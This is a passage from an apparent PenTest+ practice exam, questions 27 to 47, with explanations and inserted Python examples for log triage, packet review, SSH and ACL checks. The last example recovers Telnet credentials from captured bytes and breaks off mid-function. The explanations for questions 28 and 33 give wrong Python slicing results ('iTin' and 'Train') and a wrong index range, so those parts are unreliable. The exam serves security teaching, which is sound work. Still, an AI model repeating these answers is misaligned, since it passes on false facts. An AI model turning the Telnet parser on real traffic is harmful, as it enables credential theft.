OBJ-4.1: The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using a SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct an Xmas scan, where the FIN, PSH, and URG flags are set in the scan. The -O flag would conduct an operating system detection scan of the target system.
Question 27 of 50
27. Question
A penetration tester wants to install an integrated platform for testing web applications. The software should allow them to capture, analyze, and manipulate HTTP traffic. Which of the following tools should they install?
Correct
OBJ-4.2: Burp Suite is an integrated platform for testing web applications’ security. It acts as a local proxy so that the tester can capture, analyze, and manipulate HTTP traffic. SET (Social Engineer Toolkit) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Censys is a search engine that returns information about the types of devices connected to the Internet.
Question 28 of 50
28. Question
You are analyzing a Python script that isn’t functioning properly. You suspect the issue is with the string manipulation being used in the code. Review the following Python code snippet:
-=-=-=-=-=-
#!/usr/bin/python
s = “SkillcertproTraining.com”
print(s[1:12:3])
-=-=-=-=-=-
Based on your analysis, what should be displayed on the screen by the print command?
Correct
OBJ-4.4: When evaluating the code s[1:12:3], you would receive “iTin” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “SkillcertproTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The slice format is [start:stop:step], so s[1:12:3] is evaluated as starting with the 1st position (i in Skillcertpro, since computers start counting at 0) and counting by three until you reach the 12th position (the “.” in SkillcertproTraining.com). This would display the 1st position (i), 4th position (T), 7th position (i), 10th position (n), and then stop. This is because the command said to stop at the 12th position, but our next position to display would have been 13 when incrementing by 3 each time.
Question 29 of 50
29. Question
You want to conduct OSINT against an organization in preparation for an upcoming engagement. Which of the following tools should you utilize?
Correct
OBJ-4.2: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets, which might otherwise give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. OpenVAS, SET, and Aircrack-ng are not considered OSINT tools. OpenVAS is a vulnerability scanner. SET is a social engineering tool. Aircrack-ng is a wireless hacking tool.
Question 30 of 50
30. Question
A cybersecurity analyst is reviewing the logs of an authentication server and sees the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[443] [https-get-form] host: skillcertprotraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: skillcertpro password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: skillcertpro password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of attack was most likely being attempted by the attacker?
Correct
OBJ-4.3: Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made against each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.
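The distinction the explanation draws (few guesses per account across many accounts, versus many guesses against one account, versus unique leaked pairs) can be turned into a log-triage rule. As an added example that is not part of the practice test, the Python below parses the question's eight log entries plus two constructed contrast samples and classifies each batch; the thresholds (three users, three guesses per user) are assumptions chosen for illustration, and the host and passwords in the constructed samples are invented.

```python
"""Classify a batch of failed-login records as spraying, brute force, or stuffing."""
import re
from collections import defaultdict

# Matches the question's log format: [port] [module] host: H login: U password: P
LOG_RE = re.compile(
    r"^\[(?P<port>\d+)\] \[(?P<module>[^\]]+)\] host: (?P<host>\S+) "
    r"login: (?P<login>\S+) password: (?P<password>.*)$"
)

# The eight entries shown in the question.
SPRAY_LOG = """\
[443] [https-get-form] host: skillcertprotraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: skillcertpro password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: skillcertpro password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: skillcertprotraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: skillcertprotraining.com login: jason password: C0mpT1@P@$$w0rd
"""

# Constructed contrast sample: one account, many guesses (passwords are invented).
BRUTE_LOG = """\
[443] [https-get-form] host: example.test login: admin password: guess1
[443] [https-get-form] host: example.test login: admin password: guess2
[443] [https-get-form] host: example.test login: admin password: guess3
[443] [https-get-form] host: example.test login: admin password: guess4
[443] [https-get-form] host: example.test login: admin password: guess5
"""

# Constructed contrast sample: each user tried once with its own distinct password.
STUFF_LOG = """\
[443] [https-get-form] host: example.test login: alice password: leak-a
[443] [https-get-form] host: example.test login: bob password: leak-b
[443] [https-get-form] host: example.test login: carol password: leak-c
"""


def parse_attempts(text):
    """Return one dict per line that matches the log format; other lines are ignored."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def profile(attempts):
    """Build login -> {passwords tried} and password -> {logins it was tried on}."""
    per_user = defaultdict(set)
    per_password = defaultdict(set)
    for a in attempts:
        per_user[a["login"]].add(a["password"])
        per_password[a["password"]].add(a["login"])
    return per_user, per_password


def classify(attempts, max_guesses_per_user=3, min_users=3):
    """Label the batch using the shape of the attempts, not their volume."""
    if not attempts:
        return "no attempts"
    per_user, per_password = profile(attempts)
    users = len(per_user)
    max_per_user = max(len(pw) for pw in per_user.values())
    # Spraying: many accounts, few guesses each, the same password reused across accounts.
    if (users >= min_users and max_per_user <= max_guesses_per_user
            and any(len(logins) >= min_users for logins in per_password.values())):
        return "password spraying"
    # Brute force: one account absorbing guess after guess.
    if users == 1 and max_per_user > max_guesses_per_user:
        return "brute force against a single account"
    # Stuffing: every pair unique, nothing shared, as in a replayed breach dump.
    if (users >= min_users and all(len(l) == 1 for l in per_password.values())
            and all(len(pw) == 1 for pw in per_user.values())):
        return "possible credential stuffing (unique username/password pairs)"
    return "inconclusive"


if __name__ == "__main__":
    for name, text in (("question", SPRAY_LOG), ("brute", BRUTE_LOG), ("stuffing", STUFF_LOG)):
        attempts = parse_attempts(text)
        print(f"{name}: {len(attempts)} attempts -> {classify(attempts)}")
```

For the question's entries the profile is four users, two passwords, each password tried against all four accounts, which the rule labels as password spraying; the lockout-avoidance property the explanation mentions is exactly why per-user attempt counters alone miss it, and why the password-side view (one password, many accounts) is the signal to alert on.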
Question 31 of 50
31. Question
You are conducting a password audit. Which of these options is the least complex password?
Correct
OBJ-4.3: The least complex password of these four options is ujepmnxf. All four passwords are eight characters, so the least complex password will be the one that uses the smallest character set. As shown in the password 4@kn?Q9$, there are four character types: uppercase letters, lowercase letters, numbers, and symbols. The least complex password only uses one of these character types. Therefore, the password ujepmnxf is the least complex and least secure password since it only includes lowercase letters.
Question 32 of 50
32. Question
You are an analyst and have been asked to review and categorize the following output from a packet analysis in Wireshark:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Source Destination Protocol Length Info
192.168.3.145 4.4.2.2 DNS 74 Standard query 0xaed A test.skillcertprotraining.com
4.4.2.2 192.168.3.145 DNS 90 Standard query response 0x3aed A test.skillcertprotraining.com A 173.12.15.23
192.168.3.145 173.12.15.23 TCP 78 48134 → 80 [SYN] seq=0 Win=65635 Len=0 MSS=1426 WS=16 TSVal=486234134 Tsecr=0 SACK_PERM=1
173.12.15.23 192.168.3.145 TCP 78 80 → 48134 [SYN, ACK] seq=0 Ack=1 Win=65535 Len=0 MSS=1426 WS=4 TSVal=0 Tsecr=0 SACK_PERM=1 a1=486234134 Tsecr=240612
192.168.3.145 192.168.3.255 NBNS 92 Name query NB WORKGROUP
34.250.23.14 192.168.3.145 TCP 60 443 → 48134 [RST] Seq=1 Win=0 Len=0
34.250.23.14 192.168.3.145 TCP 60 8080 → 48134 [RST] Seq=1 Win=0 Len=0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on your review, what does this scan indicate?
Correct
OBJ-4.3: This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.skillcertprotraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the internal host’s firewall since it is not running those services on the host. None of this network traffic appears to be suspicious.
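The explanation walks the capture row by row and asks of each one: is this a lookup we made, a handshake we started, a local broadcast, or something arriving from outside? The following added example (written for this page, not from the practice test) does that triage programmatically. The rows are a constructed sample modeled on the question's capture (same addresses, with the DNS transaction IDs made to match), and the internal network `192.168.3.0/24` is an assumption.

```python
"""Tag Wireshark-style packet rows with their role and with whether they belong to
a DNS query or TCP connection the internal host itself initiated.

Added example, not from the practice test. SAMPLE_ROWS is constructed and
modeled on the question; INTERNAL is an assumed LAN prefix.
"""
import ipaddress
import re

INTERNAL = ipaddress.ip_network("192.168.3.0/24")

SAMPLE_ROWS = """\
192.168.3.145 4.4.2.2 DNS 74 Standard query 0x3aed A test.skillcertprotraining.com
4.4.2.2 192.168.3.145 DNS 90 Standard query response 0x3aed A test.skillcertprotraining.com A 173.12.15.23
192.168.3.145 173.12.15.23 TCP 78 48134 → 80 [SYN] Seq=0 Win=65535 Len=0
173.12.15.23 192.168.3.145 TCP 78 80 → 48134 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0
192.168.3.145 192.168.3.255 NBNS 92 Name query NB WORKGROUP
34.250.23.14 192.168.3.145 TCP 60 443 → 48134 [RST] Seq=1 Win=0 Len=0
34.250.23.14 192.168.3.145 TCP 60 8080 → 48134 [RST] Seq=1 Win=0 Len=0
"""

TCP_INFO = re.compile(r"(\d+)\s*(?:→|->|–|-)\s*(\d+)\s*\[([^\]]*)\]")   # "sport → dport [FLAGS]"
DNS_TXID = re.compile(r"0x[0-9a-fA-F]+")


def direction(src, dst):
    """Label a packet relative to the internal network."""
    s_in = ipaddress.ip_address(src) in INTERNAL
    d_in = ipaddress.ip_address(dst) in INTERNAL
    if s_in and d_in:
        return "local"
    return "outbound" if s_in else ("inbound" if d_in else "transit")


def classify_rows(text):
    """One dict per row: src, dst, proto, direction, role, plus
    answers_our_query (DNS responses) or known_flow (TCP) where applicable."""
    rows, syn_flows, queries = [], set(), set()
    for line in text.splitlines():
        parts = line.split(None, 4)          # Source Destination Protocol Length Info
        if len(parts) < 5:
            continue
        src, dst, proto, _length, info = parts
        row = {"src": src, "dst": dst, "proto": proto,
               "direction": direction(src, dst), "role": "other"}
        if proto == "DNS":
            m = DNS_TXID.search(info)
            txid = m.group(0).lower() if m else None
            if "response" in info:
                row["role"] = "dns_response"
                row["answers_our_query"] = txid in queries   # pairs with an earlier query by ID
            else:
                row["role"] = "dns_query"
                queries.add(txid)
        elif proto == "TCP":
            m = TCP_INFO.search(info)
            if m:
                sport, dport = int(m.group(1)), int(m.group(2))
                flags = {f.strip().upper() for f in m.group(3).split(",") if f.strip()}
                if flags == {"SYN"}:
                    row["role"] = "tcp_syn"
                    syn_flows.add((src, sport, dst, dport))
                    row["known_flow"] = True
                else:
                    # Replies travel server -> client, so look the flow up from the client's side.
                    row["known_flow"] = (dst, dport, src, sport) in syn_flows
                    if flags == {"SYN", "ACK"}:
                        row["role"] = "tcp_syn_ack"
                    elif "RST" in flags:
                        row["role"] = "tcp_rst"
                    else:
                        row["role"] = "tcp_other"
        elif proto == "NBNS":
            row["role"] = "nbns_broadcast" if dst.endswith(".255") else "nbns_unicast"
        rows.append(row)
    return rows


def unmatched_tcp(rows):
    """TCP rows with no SYN from the internal host in this capture: the ones to explain."""
    return [(r["src"], r["dst"], r["role"]) for r in rows
            if r["proto"] == "TCP" and not r.get("known_flow", False)]
```

The `known_flow` field is the useful output: the SYN-ACK from 173.12.15.23 pairs with the SYN the internal host sent, while the two RST rows from 34.250.23.14 have no SYN in this capture to pair with, so an analyst confirming the "normal traffic" verdict would want to find the originating connection in a wider capture window.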
Question 33 of 50
33. Question
You are analyzing a Python script that isn’t functioning properly. You suspect the issue is with the string manipulation being used in the code. Review the following Python code snippet:
-=-=-=-=-=-
#!/usr/bin/python
s = "SkillcertproTraining.com"
print(s[4:9])
-=-=-=-=-=-
Based on your analysis, what should be displayed on the screen by the print command?
Correct
OBJ-4.4: When evaluating the code s[4:9], you would receive “Train” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “SkillcertproTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The format for the array is [start:end:increment], so s[4:9] is evaluated as starting with the 4th position (T in SkillcertproTraining.com since computers start counting at 0) and continuing to display letters until it reaches the 9th position (the second letter i in Training). This is because it treats ranges as the start value and the value to stop when it reaches it, similar to a for loop. If we wanted that “I” to be displayed as well, we would need to stop at 10 instead of 9. Since there is no increment provided in this argument, it uses the default of 1 position at a time, moving from left to right as it counts upward through the string.
Question 34 of 50
34. Question
You are working as a network administrator and are worried about the possibility of an insider threat. You want to enable a security feature that would remember the Layer 2 address first connected to a particular switch port to prevent someone from unplugging a workstation from the switch port and connecting their own laptop to that same switch port. Which of the following security features would BEST accomplish this goal?
Correct
OBJ-5.3: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.
Question 35 of 50
35. Question
Jeff has been contacted by an external security company and told that they had found a copy of his company’s proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?
Correct
OBJ-5.3: Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company’s ongoing business operations. Reevaluation of the company’s information management policies should be done, but this is not as time-critical as changing the repository’s public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.
Question 36 of 50
36. Question
During a penetration test of your company’s network, the assessor came across a spreadsheet with the passwords being used for several servers. Four of the passwords recovered are listed below. Which one is the weakest password and should be changed FIRST to increase the password’s complexity?
Correct
OBJ-5.3: Password policies often enforce a mixture of standard character types, including uppercase letters, lowercase letters, numbers, and symbols. The option ‘pa55word’ is the weakest choice since it only includes lowercase letters and numbers. The option ‘Pa55w0rd’ is slightly more complex since it includes uppercase letters, lowercase letters, and numbers. The option ‘P@$$W0RD’ is also similar in complexity since it includes uppercase letters, numbers, and special characters. The most secure option is ‘P@5$w0rd’ since it includes a mixture of uppercase letters, lowercase letters, numbers, and special characters.
Question 37 of 50
37. Question
You are working as part of a penetration testing team during an engagement. A coworker just entered “Get-Service -DisplayName “Skillcertpro Training App” | Remove-Service” in PowerShell on the Windows server the team exploited. What action is your coworker performing with this command?
Correct
OBJ-5.2: This scenario is using a chained command to remove persistence from a Windows server using PowerShell. The command entered removes a service named Skillcertpro Training App. The command uses Get-Service to get an object representing the Skillcertpro Training App service using the display name. The pipeline operator (|) pipes the object to Remove-Service, which removes the service. This will remove any persistence gained by running the Skillcertpro Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.
Question 38 of 50
38. Question
You are working as a penetration tester conducting an engagement against Skillcertpro Training’s network. You have just conducted a successful exploit of the company’s Active Directory server. A few minutes later, you receive a call from the company’s trusted agent asking if you have just created a new administrative user named “TheMightOne” in their domain controller. You tell the agent that you did, and he says, “Ok, I will wait to see how long it takes for my team to notice it on their own.” Which of the following BEST describes this scenario?
Correct
OBJ-5.4: De-confliction is the process of avoiding an early conclusion to an engagement by coordinating the penetration testing team’s efforts amongst themselves or with a few key trusted personnel in the client organization. If the penetration tester did not create the account, then the trusted agent would have begun an incident response to hunt down and clear the cause of a new administrative account being created. If this occurred, the penetration test would have been stopped or paused during this incident response.
Question 39 of 50
39. Question
What is not one of the three categories of solutions that all of the pentester’s recommended mitigations should fall into?
Correct
OBJ-5.3: All possible solutions can be categorized as People, Process, or Technology solutions.
Question 40 of 50
40. Question
You work for Skillcertpro Training as a physical security manager. You are concerned that the physical security at the entrance to the company is not sufficient. To increase your security, you are determined to prevent piggybacking. What technique should you implement first?
Correct
OBJ-5.3: A mantrap is a device that only allows a single person to enter per authentication. This authentication can be done by RFID, a PIN, or other methods. Once verified, the mantrap lets a single person enter through a system, such as a turnstile or rotating door. CCTV will not stop piggybacking, but it could be used as a detective control after an occurrence. Wearing security badges is useful, but it won’t stop piggybacking by a skilled social engineer. RFID badges may be used as part of your entry requirements, but they won’t stop a determined piggybacker who follows an employee into the building after the employee’s authenticated RFID access has been performed.
Question 41 of 50
41. Question
What is the term for the amount of risk that an organization is willing to accept or tolerate?
Correct
OBJ-5.1: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan it less frequently, for example. If you have a low risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.
Question 42 of 50
42. Question
What activity is not a part of the post-engagement cleanup?
Correct
OBJ-5.2: Pentesters rarely need to modify log files, and log modification should not be performed after an assessment/engagement has occurred. When an assessment is complete, the pentester should remove any shells, tester-created credentials, or tools from the victimized hosts to ensure an attacker does not utilize them against the organization, too.
Question 43 of 50
43. Question
Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh?
Correct
OBJ-5.3: Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn’t know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won’t help either since the sudoers group allows users to log in as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.
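Verifying that a host actually has root login denied is slightly more than grepping for `PermitRootLogin no`, because sshd keeps the first value it reads for a keyword and ignores later duplicates, and because a `Match` block can set the keyword again for a subset of clients. The following added example (written for this page, not from the practice test or OpenSSH itself) is a small audit check that models those two rules. The three config fragments are constructed; the default of `prohibit-password` is OpenSSH's documented default since 7.0, and the checker treats only the value `no` as denying root login, since that is the value sshd_config(5) defines for it.

```python
"""Audit check: does an sshd_config actually deny root logins?

Added example, not from the practice test. Models two sshd_config rules:
  1. for each keyword, the FIRST value wins (later duplicates are ignored);
  2. everything after a 'Match' line is conditional, so it does not change
     the global value but can re-enable root for the matched clients.
The three configs below are constructed samples.
"""
import re

DEFAULT_PERMIT_ROOT_LOGIN = "prohibit-password"   # OpenSSH default since 7.0

WEAK_CONFIG = """\
# root login left wide open
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
Match Address 10.0.0.0/8
    PermitRootLogin prohibit-password   # conditional: only for the matched clients
"""

FIRST_WINS_CONFIG = """\
PermitRootLogin yes
PermitRootLogin no   # never takes effect: sshd already took 'yes' above
"""

# "Keyword value" or "Keyword=value"; keywords are case-insensitive.
_LINE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9]*)(?:\s*=\s*|\s+)(.*?)\s*$")


def _directives(config_text):
    """Yield (keyword_lower, value, match_criteria) per directive; criteria is None globally."""
    criteria = None
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # '#' to end of line is a comment
        if not line:
            continue
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            criteria = value                      # all following lines are conditional
            continue
        yield key, value, criteria


def effective_global_value(config_text, keyword, default):
    """The value sshd will use globally: the first occurrence outside any Match block."""
    for key, value, criteria in _directives(config_text):
        if criteria is None and key == keyword.lower():
            return value
    return default


def root_login_denied(config_text):
    """True only when the global PermitRootLogin resolves to 'no'."""
    value = effective_global_value(config_text, "PermitRootLogin", DEFAULT_PERMIT_ROOT_LOGIN)
    return value.lower() == "no"


def match_overrides(config_text, keyword="PermitRootLogin"):
    """(criteria, value) pairs set inside Match blocks; review these separately."""
    return [(criteria, value) for key, value, criteria in _directives(config_text)
            if criteria is not None and key == keyword.lower()]


if __name__ == "__main__":
    for name, cfg in [("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG),
                      ("first-wins", FIRST_WINS_CONFIG)]:
        print(f"{name:11} root denied={root_login_denied(cfg)} overrides={match_overrides(cfg)}")
```

On a live host, feed it the output of `sshd -T` rather than the file when you want the daemon's own view after defaults and includes are resolved; the file-level check above is what tells you why the effective value is what it is.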
Question 44 of 50
44. Question
Review the following packet captured at your NIDS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389 Flags [P.], Seq 1834:1245, ack 1, win 511, options [nop,nop,TS val 263451334 ecr 482862734], length 125
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host?
Correct
OBJ-5.3: Since the question asks you to prevent unauthorized service access, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).
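The requirement has two halves: the entry must stop RDP to the host, and it must not disturb the approved services. Both depend on ACL ordering and scope, which the following added example (written for this page, not from the practice test or any vendor) makes testable. It models Cisco-style semantics (first match wins, implicit deny at the end); the approved ports 80 and 443 and the client address are assumptions, while the host and port 3389 come from the question.

```python
"""First-match ACL evaluation: deny RDP (3389) to the host, keep approved services reachable.

Added example, not from the practice test. Cisco-style semantics are modeled
(first matching entry wins, implicit deny if nothing matches). APPROVED_PORTS
and the client address are assumptions; HOST and 3389 are from the question.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

HOST = "71.168.10.45"          # host seen in the NIDS capture
UNAUTHORIZED_PORT = 3389       # RDP, found running without authorization
APPROVED_PORTS = (80, 443)     # assumption: what the host is supposed to serve


@dataclass(frozen=True)
class Rule:
    action: str                  # "permit" or "deny"
    proto: str                   # "tcp", "udp" or "ip" (any protocol)
    src: str                     # "any", a host address or a CIDR prefix
    dst: str
    dport: Optional[int] = None  # None means any destination port


def _addr_match(spec, ip):
    return spec == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def evaluate(acl, proto, src, dst, dport):
    """Return 'permit' or 'deny' for one packet; unmatched traffic hits the implicit deny."""
    for rule in acl:
        if rule.proto not in ("ip", proto):
            continue
        if not (_addr_match(rule.src, src) and _addr_match(rule.dst, dst)):
            continue
        if rule.dport is not None and rule.dport != dport:
            continue
        return rule.action
    return "deny"


# The answer's entry, i.e. "deny tcp any host 71.168.10.45 eq 3389" followed by a permit.
TARGETED_ACL = [Rule("deny", "tcp", "any", HOST, UNAUTHORIZED_PORT),
                Rule("permit", "ip", "any", "any")]

# Two common mistakes for comparison: denying the whole host, and putting the deny after a permit-all.
TOO_BROAD_ACL = [Rule("deny", "ip", "any", HOST),
                 Rule("permit", "ip", "any", "any")]
WRONG_ORDER_ACL = [Rule("permit", "ip", "any", "any"),
                   Rule("deny", "tcp", "any", HOST, UNAUTHORIZED_PORT)]


def check_policy(acl, host=HOST, approved=APPROVED_PORTS, blocked=UNAUTHORIZED_PORT,
                 client="203.0.113.10"):
    """Does the ACL block the unauthorized service AND keep every approved one reachable?"""
    return {
        "blocks_unauthorized": evaluate(acl, "tcp", client, host, blocked) == "deny",
        "keeps_approved": all(evaluate(acl, "tcp", client, host, p) == "permit" for p in approved),
    }


if __name__ == "__main__":
    for name, acl in [("targeted", TARGETED_ACL), ("too broad", TOO_BROAD_ACL),
                      ("wrong order", WRONG_ORDER_ACL)]:
        print(f"{name:12} {check_policy(acl)}")
```

Only the targeted entry satisfies both halves; the host-wide deny meets the first requirement and fails the second, and the mis-ordered list never reaches its deny because the permit-all matches first.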
Question 45 of 50
45. Question
Which analysis framework is essentially a repository of known IOCs with ties to known specific threats?
Correct
OBJ-5.4: OpenIOC is essentially just a flat database of known indicators of compromise. The MITRE ATT&CK provides additional details about detection and mitigation. The Diamond model is an analytic framework for describing an attacker’s work. Lockheed Martin’s cyber kill chain provides a generalized concept for how an attacker might approach a network but does not deal with individual IOCs’ specifics.
Question 46 of 50
46. Question
During a recent penetration test, it was discovered that your company’s wireless network could be reached from the parking lot. The Chief Security Officer has submitted a change request to your network engineering team to solve this issue because he wants to ensure that the wireless network is only accessible from within the building. Based on these requirements, which of the following settings should be changed to ensure the wireless signal doesn’t extend beyond your building’s interior while maintaining a high level of availability to your users?
OBJ-5.3: Reduce the transmit power level of the radios in the wireless access points. A lower power level shortens the signal's reach, so it can be tuned to keep the signal within the building's interior while still serving the users inside. The other options, if changed, would affect the availability of the network to the currently configured users and their devices. Power reduction limits exposure rather than guaranteeing containment: an attacker with a directional high-gain antenna can still receive a weakened signal from outside, so a follow-up site survey should confirm the result.
Question 47 of 50
47. Question
A network technician is using telnet to connect to a router on a network that has been compromised. A new user and password have been added to the router with full rights. The technician is concerned that the regularly used administrator account has been compromised. After changing the password on all the networking devices, which of the following should the technician do to prevent the password from being sniffed on the network again?
OBJ-5.3: Disable Telnet and use SSH for device management. Telnet (TCP port 23) sends the entire session, including the username and password, in cleartext, so anyone able to sniff the network segment can recover the credentials. SSH (TCP port 22) encrypts the whole session, so a sniffer sees only ciphertext. Changing the passwords alone does not help if the new password is again typed over Telnet. As an additional hardening step for administrator accounts, prefer SSH public-key authentication over passwords.
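The following added example (not code from the practice test) shows exactly what "passes all information as unencrypted traffic" means in practice: it takes the raw bytes of a Telnet session, strips the RFC 854 option negotiation (IAC sequences) that surrounds the typed text, and pairs the server's login prompts with the next client line to recover the username, password and subsequent commands. The session bytes, host name, credentials and command are constructed for the illustration; the only assumption in the logic is that prompts end in "Username:", "login:" or "Password:", as they do on common network devices.

```python
"""Recover cleartext credentials from a Telnet session's raw bytes.

Added example for the Telnet-versus-SSH question; not code from the
practice test. The session bytes, host name and credentials are constructed.
"""

# Telnet command bytes from RFC 854.
IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
# Option codes used in the constructed sample.
TERMINAL_TYPE, ECHO, SUPPRESS_GO_AHEAD = 24, 1, 3


def strip_telnet_commands(data: bytes) -> bytes:
    """Remove IAC option negotiation and subnegotiation, keeping user data.
    IAC IAC is an escaped literal 0xFF byte and is kept."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        if data[i] != IAC:
            out.append(data[i])
            i += 1
            continue
        if i + 1 >= n:              # truncated IAC at end of segment: drop it
            break
        cmd = data[i + 1]
        if cmd == IAC:              # escaped data byte
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                  # IAC <cmd> <option>
        elif cmd == SB:             # IAC SB ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:
            i += 2                  # other two-byte commands (NOP, AYT, GA, ...)
    return bytes(out)


def _complete_lines(buf: str):
    """Split buffered client text into finished lines and the unfinished rest,
    accepting CR LF, CR NUL and bare LF line endings."""
    buf = buf.replace("\r\x00", "\n").replace("\r\n", "\n")
    parts = buf.split("\n")
    return parts[:-1], parts[-1]


def recover_credentials(segments):
    """segments: (direction, raw_bytes) pairs in capture order, 'S' for
    server->client and 'C' for client->server. A server prompt ending in
    'username:', 'login:' or 'password:' is paired with the next client line;
    every other client line is recorded as a command."""
    found = {"username": None, "password": None, "commands": []}
    expecting = None
    client_buf = ""
    for direction, raw in segments:
        text = strip_telnet_commands(raw).decode("latin-1")
        if direction == "S":
            prompt = text.strip().lower()
            if prompt.endswith(("username:", "login:")):
                expecting = "username"
            elif prompt.endswith("password:"):
                expecting = "password"
            else:
                expecting = None    # banner, echo or shell prompt
            continue
        client_buf += text
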